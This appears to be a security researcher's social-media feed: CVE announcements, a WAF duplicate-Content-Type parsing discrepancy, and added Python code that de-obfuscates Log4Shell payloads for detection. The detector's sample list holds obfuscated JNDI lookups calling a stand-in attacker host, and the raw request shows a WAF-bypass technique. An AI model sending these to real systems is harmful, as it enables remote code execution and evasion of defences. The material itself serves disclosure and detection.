Security researcher with over a decade of experience in network, application and cloud security. Speaker at BlackHat, HITB, CanSecWest and TyphoonCon.

Joined February 2016
Pinned Tweet
May 28
Amazing vibe! Really impressive experience!
🌪️ Now on stage @pyn3rd revealing the hidden attack surface of ClickHouse
Jun 12
#CVE-2026-48907 Unauthenticated RCE in #Joomla Content Editor Extension
Jun 10
#CVE-2026-8054: #dotCMS Core SQL Injection. Based on internet-wide exposure data in Shodan, many organizations appear to be running #dotCMS instances. Users are strongly encouraged to upgrade and patch affected systems immediately.
Jun 2
I know that for sure. However, even when a Content-Length header is present, inconsistencies in the Content-Type header can still create problems. Some WAFs, such as F5 BIG-IP, may treat such requests as protocol non-compliant and refuse to forward them to the upstream application. The concern is that with this type of “chaotic” request, forwarding it can introduce security risks regardless of whether the WAF chooses the first or the second interpretation. For example, if the WAF parses and validates the request as application/x-www-form-urlencoded while the upstream application interprets it as application/json, discrepancies in request processing may arise, potentially leading to security issues. The reverse scenario is equally problematic.
Replying to @pyn3rd
That's correct but it's missing the content length because the focus of the post was the duplicate headers. It's not meant to be used verbatim.
Jun 2
Regarding the Apache ActiveMQ vulnerabilities we reported, one was dismissed as not a security issue because its root cause lies in XStream, which now whitelists only java.lang.String for deserialization. This post strongly warns you about configuring systems in untrusted environments.
Replying to @pyn3rd
Apache ActiveMQ is having a rough month. Two more CVEs.
⚠️ CVE-2026-42253 - HTTP Response Header Injection via JMS Message Properties
⚠️ CVE-2026-42588 - RCE via Jolokia addNetworkConnector
The Jolokia one is the scary one - default access policy permits exec operations on all ActiveMQ MBeans. Fix: upgrade to 5.19.7 or 6.2.6. VulnTracker.io
Jun 1
#CVE-2026-42253 Apache ActiveMQ Web: HTTP Response Header Injection via JMS Message Properties
#CVE-2026-42588 Apache ActiveMQ: Remote Code Execution via Jolokia addNetworkConnector
These two vulnerabilities we reported have been credited.
May 30
This kind of abnormal HTTP request is related to protocol compliance with the RFC specifications. For example, Akamai WAF even rejects POST requests that do not include a Content-Length header.
POST /api/update HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Type: application/json

{"test": true}
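The two posts above (the duplicate Content-Type request, and the earlier reply about a WAF validating the body as application/x-www-form-urlencoded while the upstream parses it as application/json) describe a parser discrepancy. The block below is an added example, not code from the thread: it parses the posted request, flags the compliance problems a strict gateway would reject (duplicate Content-Type; a POST with neither Content-Length nor Transfer-Encoding), and shows what a first-header-wins inspector and a last-header-wins application each see in the same body. The second request, with a Content-Length added, is constructed for the example; target.com and the body are taken from the post.

```python
import json
from urllib.parse import parse_qs

# The request exactly as posted in the thread (no Content-Length).
RAW_REQUEST_AS_POSTED = (
    b"POST /api/update HTTP/1.1\r\n"
    b"Host: target.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Type: application/json\r\n"
    b"\r\n"
    b'{"test": true}'
)

# Constructed variant: same request completed with a Content-Length header
# so the only remaining oddity is the duplicate Content-Type.
RAW_REQUEST_WITH_LENGTH = (
    b"POST /api/update HTTP/1.1\r\n"
    b"Host: target.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 14\r\n"
    b"\r\n"
    b'{"test": true}'
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, headers, body).
    Headers are kept as an ordered list of (name, value) so duplicates survive
    instead of being silently merged or overwritten by a dict."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def duplicate_headers(headers):
    """Header names that occur more than once. Content-Type is single-valued,
    so a repeat is a protocol-compliance problem, not a list to merge."""
    counts = {}
    for name, _ in headers:
        counts[name] = counts.get(name, 0) + 1
    return sorted(name for name, n in counts.items() if n > 1)


def compliance_problems(request_line, headers):
    """Checks a strict gateway might apply before forwarding the request."""
    problems = []
    method = request_line.split(" ")[0]
    names = {name for name, _ in headers}
    if method in ("POST", "PUT", "PATCH") and not names & {"content-length", "transfer-encoding"}:
        problems.append("body-carrying request without Content-Length or Transfer-Encoding")
    for name in duplicate_headers(headers):
        problems.append(f"duplicate header: {name}")
    return problems


def effective_content_type(headers, policy):
    """'first' models an inspector that honours the first Content-Type,
    'last' models a parser that lets the later header overwrite the earlier one."""
    values = [value for name, value in headers if name == "content-type"]
    if not values:
        return None
    return values[0] if policy == "first" else values[-1]


def interpret_body(headers, body, policy):
    """Parse the body under whichever Content-Type the policy selects.
    Returns (content type used, parsed parameters)."""
    ctype = effective_content_type(headers, policy)
    if ctype == "application/x-www-form-urlencoded":
        return ctype, parse_qs(body.decode("utf-8"), keep_blank_values=True)
    if ctype == "application/json":
        return ctype, json.loads(body)
    return ctype, None


if __name__ == "__main__":
    request_line, headers, body = parse_request(RAW_REQUEST_WITH_LENGTH)
    print("problems:", compliance_problems(request_line, headers))
    # First-wins inspector sees one opaque form field with an empty value and
    # nothing resembling a JSON document; last-wins application sees {"test": True}.
    print("inspector sees:", interpret_body(headers, body, "first"))
    print("application sees:", interpret_body(headers, body, "last"))
```

The form-urlencoded view turns the whole JSON document into a single blank-valued key, so any inspection rule written against JSON fields never fires, while the application decodes it as JSON. Rejecting the request on the duplicate header, as the thread says some WAFs do, is the conservative answer; the alternative is to normalise to one parser and forward only the canonical form.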
May 29
If you have any Log4Shell obfuscated variants for WAF bypass, please let me know — my detection approach can normalize and reconstruct all of them😆 x.com/pyn3rd/status/19994534…

Hey bug bounty hunters 👋 Apache log4j is not dead. Before you skip Apache log4j targets in 2026, read this: pingback.sh/article-log4j-20… We documented exactly where, how, and how to report it clean. Drop everything and read: #BugBounty #Log4Shell #BugBountyTips
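The post above is about normalising obfuscated Log4Shell payloads before matching them. The block below is an added illustration of that idea, not the author's detection approach and not code from the linked article: it resolves the Log4j 2 lookup forms most WAF-bypass variants are built from (${lower:…}, ${upper:…}, and the ${var:-default} syntax behind ${::-j} and ${env:NOPE:-j}) innermost-first until the string stops changing, then matches the reconstructed ${jndi: prefix case-insensitively, as Log4j lower-cases lookup prefixes. The sample payloads and the attacker.example host are constructed for the example.

```python
import re

# Innermost ${...} with no nested ${ or } inside; resolving these first lets
# the outer lookup be rebuilt from its pieces on the next pass.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# Log4j lower-cases the lookup prefix, so JnDi and jndi are the same lookup.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Value a Log4j 2 StrSubstitutor would produce for one innermost lookup
    body, or None for lookups we deliberately leave in place (jndi, env, ...)."""
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    if ":-" in body:
        # ${var:-default}: an unresolvable var collapses to its default, which is
        # how ${::-j}, ${env:BARFOO:-j} and ${sys:nope:-j} all become "j".
        return body.split(":-", 1)[1]
    return None


def normalize(payload: str, max_rounds: int = 50) -> str:
    """Repeatedly resolve innermost lookups until a fixed point is reached.
    max_rounds bounds pathological inputs; real payloads need a handful."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            value = _resolve(m)
            if value is None:
                return m.group(0)
            changed = True
            return value

        payload = INNERMOST.sub(repl, payload)
        if not changed:
            break
    return payload


def is_jndi_lookup(payload: str) -> bool:
    """True if the payload, once de-obfuscated, contains a JNDI lookup."""
    return JNDI.search(normalize(payload)) is not None


# Constructed samples: plain payload, three obfuscated variants, two benign strings.
SAMPLES = [
    "${jndi:ldap://attacker.example/a}",
    "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}",
    "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/a}",
    "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://attacker.example/a}",
    "${${upper:j}${upper:n}di:ldap://attacker.example/a}",
    "User-Agent: Mozilla/5.0 (${env:HOME})",
    "${date:yyyy-MM-dd} request completed",
]


def scan(samples):
    """Return (original, normalized, flagged) for each sample."""
    return [(s, normalize(s), is_jndi_lookup(s)) for s in samples]


if __name__ == "__main__":
    for original, normalized, flagged in scan(SAMPLES):
        print(f"{'ALERT' if flagged else 'ok   '} {normalized!r}  <-  {original!r}")
```

Matching on the normalised string rather than on the raw bytes is what defeats the character-splitting variants; a raw-pattern rule for `${jndi:` sees none of the three obfuscated samples. Other lookups (env, sys, date) are left unresolved on purpose so the normaliser never has to evaluate anything environment-dependent.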
pyn3rd retweeted
🌪️ Now on stage @pyn3rd revealing the hidden attack surface of ClickHouse
May 27
Just arrived in Seoul for @typhooncon! Not only is this my first time attending the conference, but it’s also my first time in Korea. Really loving the vibe already! 🇰🇷
May 26
More than a year ago, I shared a sneaky type of backdoor that steals SSH passwords and exfiltrates them through DNS TXT records. Looks like my tweets have been on a #SupplyChain poisoner's radar ever since. 😅 x.com/pyn3rd/status/18548791…
Security researchers have exposed a malicious Go module backdoor hidden inside the shopsprint/decimal package that executes code using stealthy DNS TXT records. #SupplyChainAttack #GoLang #CybersecurityNews #AppSec #Malware securityonline.info/maliciou…